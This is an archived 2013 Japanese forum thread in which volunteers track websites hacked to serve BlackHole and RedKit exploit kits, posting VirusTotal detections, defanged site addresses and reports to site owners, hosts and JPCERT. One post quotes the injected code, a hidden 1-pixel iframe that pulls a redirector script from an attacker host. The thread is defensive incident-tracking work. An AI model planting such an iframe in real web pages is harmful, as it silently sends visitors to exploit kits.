
BlackHole Exploit Kit Redirector Siteの新種のScript
File type:　HTML
Detection ratio:　 1 / 46
Analysis date:　 2013-05-11 18:18:17 UTC
Antivirus 　 Result 　 Update
Norman 　 BlacoleRef.BA 　 20130511

んで、飛び先のひとつ
File type:　HTML
Detection ratio:　 6 / 46
Analysis date:　 2013-05-11 18:39:21 UTC
Antivirus 　 Result 　 Update
BitDefender 　 Trojan.Html.Fakealert.P 　 20130511
Emsisoft 　 Trojan.Html.Fakealert.P (B) 　 20130511
F-Secure 　 Trojan.Html.Fakealert.P 　 20130511
GData 　 Trojan.Html.Fakealert.P 　 20130511
MicroWorld-eScan 　 Trojan.Html.Fakealert.P 　 20130511
nProtect 　 Trojan.Html.Fakealert.P 　 20130510
ESETもどきに連れてかれたん

72 ：

apple-hikkoshi●co●jp/
403、404が改竄されとるんｗ
ishigo●sytes●net
※電凸済み

73 ：

>>72 コード
＜!-- . --＞＜iframe width="1px" height="1px" src="ｈｔｔｐ：／／ishigo●sytes●net/openstat/appropriate/promise-ourselves●php" style="display:block;" ＞＜/iframe＞＜!-- . --＞

74 ：

>>72
修正を確認すた…

75 ：

お疲れ様です。
某公益社団法人のサイトがやられていますた。＞BlackHole Exploit Kit
おしんにめる済み

76 ：

kusuo-o●net
ど　う　し　て　こ　う　な　っ　た　？
c o m m o n / j s / s c r i p t . j s

77 ：

gakunavi●net

78 ：

>>76-77
どーん
>76
>>75と同じBlackHole Exploit Kit Redirector
ユーザーへのメールは届かなかったみたい。
toやccが多いと不通になるようです。。。
>77
2013-05-07 08:28:11 UTC （日本時間 : 2013/5/07 17:28:11）にはVirusTotalに投げられてますた。

あきた寝る

79 ：

>>78
乙カレー丼
>>76はミンスのＨＰに投げてみた

80 ：

210●148●117●65/
色々な意味でｽｹﾞｪｗ

81 ：

>>76 の件
ミンスから返信
・鯖業者と相談して対応
・JPCERTにはミンス(党本部)から連絡済
とのこと。
kusuo-o●net
>ただいまメンテナンス中です。
>後日公開させていただきます。
見に行ったらメンテ中だた...

82 ：

>>80
逆引きもぁぅぁぅぁー
きゅう電工のWebフォームは漏れのメアドをスパム認定。。。orz......
上流のIIJにつーほー

>>81
他のページやjsは生きてるお　ﾌﾐﾀﾞｲかも
再要請すた。

83 ：

> 再要請
さくらにつーほ >>6

84 ：

>>82 >>76
ｱｰｯ　　　orz

85 ：

コテ忘れるし、sageてないし…　orz

86 ：

>>76
さくら対応
>>80
御本人様から対応のお返事頂きました

以上確認しました。
皆様お疲れ様です。 m(_ _)m

87 ：

BlackHole Exploit Kit Redirector
検体2通、いくつか宛先不通になってた
1通目は、薬物(Viagra等)販売サイトのドメインがあったので
同じとこ逝く2通目アドレス伏せたけど、中間スクリプトのドメインがNGだったもより orz...........
薬物販売サイトにも罠があるっぽい
File size:[TAB]50.3 KB ( 51517 bytes )
File type:[TAB]HTML
Detection ratio:[TAB] 2 / 47
Analysis date:[TAB] 2013-05-22 16:21:42 UTC
Antivirus [TAB] Result [TAB] Update
Avast [TAB] HTML:Script-inf [TAB] 20130522
GData [TAB] HTML:Script-inf [TAB] 20130522

88 ：

JaneViewの設定だお＞[TAB]
>87やりなおし
File size:　50.3 KB ( 51517 bytes )
File name:　pl.txt
File type:　HTML
Detection ratio:　 2 / 47
Analysis date:　 2013-05-22 16:21:42 UTC
Antivirus 　 Result 　 Update
Avast 　 HTML:Script-inf 　 20130522
GData 　 HTML:Script-inf 　 20130522
んで感染サイトのスクリプトは
File size:　8.4 KB ( 8624 bytes )
File name:　index.html
File type:　HTML
Detection ratio:　 4 / 47
Analysis date:　 2013-05-22 15:50:35 UTC
Antivirus 　 Result 　 Update
Fortinet 　 JS/Iframe.DDG!tr.dldr 　 20130522
Kaspersky 　 Trojan-Downloader.JS.Iframe.ddr 　 20130522
McAfee 　 JS/Exploit-Blacole.ht 　 20130522
NANO-Antivirus 　 Trojan.Script.Expack.bqgmvl
中間スクリプト
File size:　241 bytes ( 241 bytes )
File type:　HTML
Detection ratio:　 2 / 47
Analysis date:　 2013-05-22 16:12:15 UTC
Antivirus 　 Result 　 Update
McAfee 　 Exploit-Rekit.f 　 20130522
Sophos 　 Troj/ExpJS-II 　 20130522

89 ：

ァッｰ

追っかけてたら、辿り付いた
http://www.google.com/safebrowsing/diagnostic?site=ime.nu
クッションサイトだからかな

90 ：

RedKit Exploit Kit Redirector
ランダムな中間スクリプト
File type:　HTML
Detection ratio:　 3 / 47
Analysis date:　 2013-05-26 14:39:38 UTC
McAfee 　 JS/Exploit-Blacole.lt 　 20130526
McAfee-GW-Edition 　 JS/Exploit-Blacole.lt 　 20130526
Sophos 　 Troj/ExpJS-II 　 20130522
まかひとそふぉぉぉぉすががむばってるん
相変わらずこちらの環境ではﾌﾞﾂ落とせないままぽ

91 ：

memo
g01pack exploit kit
エフセキュアブログ : g01pack
http://blog.f-secure.jp/tag/g01pack

92 ：

>>91
現在の最新情報
エフセキュアブログ : g01packがシェア拡大の兆し
http://blog.f-secure.jp/archives/50701223.html

93 ：

www●muse●dti●ne●jp/~ohyes/

94 ：

>>93
お疲れ様です。
夢列車につーほーしますた。

95 ：

まだ直ってないようですが、
恐らくひげおぢさんがﾋﾟｺｰﾝしたら対応されるかも>93
んで関連
2689367b205c16ce32ed4200942b8b8b1e262dfc70d9bc9fbc77c49699a4f1df/analysis/1166513002/
コメントしてる人やベンダーを責められないと思ふ
ひょっとして>>15なぬかようか

96 ：

>>95
MD5: 444bcb3a3fcf8389296c49467f27e1d6
http://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Ejaipa%2Eor%2Ejp%2Fevent%2Foki%5Fict2011%2F111215%5Fmicrosoft%5Fhan%2Epdf

97 ：

www●trajal●net/k-b●html
www●f-airline●com/
lukes-world●co●jp/
www2●patt●gr●jp/~ryo/

98 ：

松浦とみよし 市議会議員
www4●ocn●ne●jp/~tomiyosi/
連絡したのにこの状態。。。

99 ：

>>97-98
お疲れ様です。
つーほーしました。
以前にもつーほーしたのがあったやうな
つーほー漏れかなん。。。orz...........

100read 1read

1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲

Jetico Personal Firewall Part14 (357)
ト　レ　ン　ド　マ　イ　ク　ロ（笑） (753)
Comodo AntiVirus (495)
WMF 脆弱性対策スレッド (464)
MSEスレの重複削除されたスレのレスを補完するスレ (403)
【TBS土8】ブラッディ・マンデイ【ハッカー目線】 (256)
--log9.info------------------
【ソウルの】Ray　Charles【生みの親】 (216)
ニューオーリンズのＲ＆Ｂ、ＳＯＵＬ、ＦＵＮＫ (860)
Ｒ＆Ｂ・Soulのベースの件について (855)
【R&B・SOUL】2000年代ベストアルバム【投票】 (417)
RB・SOUL板の人が聴く他ｼﾞｬﾝﾙの音楽 (319)
☆★☆R&B・SOUL好きの聴くHIPHOP☆★☆ (416)
BOBBY BROWN〜ボビー･ブラウン (645)
Full Force（安室奈美恵） (188)
○●ZAPPROGER●○ (431)
Crystal Kay【安室ちゃん大好き】クリちゃん (577)
似てる歌手●安室とアリーヤ●アッシャーとニカウ● (626)
【クリケイ】　Michico　【安室奈美恵】 (757)
[SOUL]マイケルジャクソン[R&B] (463)
R＆B・SOULのプロデューサー達 (464)
Toni Braxton トニ・ブラクストン Part2 (806)
最新シングル・アルバムスレ (131)
--log55.com------------------
のほほんとサボテン育てないか？
孤独をﾎﾟｼﾞﾃｨｳﾞに捉えるスレ２ヽ( ・∀・)ノイェー
誰も来ないスレ
どんだけ過疎なんだここ・・・・・・・
俺たちのNHDM
また気付いたら一日終わってた
ちびまる子ちゃんが始まると憂鬱になる
お仕事行きたくないね